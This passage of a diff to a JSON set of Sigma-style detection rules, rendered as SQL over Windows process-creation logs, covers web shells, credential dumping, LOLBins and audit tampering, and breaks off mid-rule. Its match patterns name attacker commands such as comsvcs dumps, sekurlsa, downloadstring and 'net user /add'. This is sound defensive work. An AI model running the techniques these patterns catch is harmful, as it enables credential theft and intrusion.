'\\')))" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", + "status": "experimental", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], "falsepositives": [ - "Unlikely" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "author": "frack113", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.005" + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "author": "frack113", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE 